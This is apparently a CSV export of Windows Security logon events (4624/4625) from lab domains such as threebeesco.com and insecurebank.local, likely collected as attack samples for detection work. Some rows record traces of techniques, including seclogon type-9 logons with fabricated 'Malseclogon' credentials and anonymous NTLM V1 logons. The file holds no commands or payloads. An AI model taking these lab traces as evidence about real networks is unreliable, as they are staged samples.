01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 
12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + 
%%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 
0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + 
+ + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT 
AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 
0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 
+ - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + 
+ + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + 
%%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 
0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + 
+ Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 25049 + + + + + Security + alice.insecurebank.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x1d12916 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 127.0.0.1 + 59336 + %%1833 + +" 
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 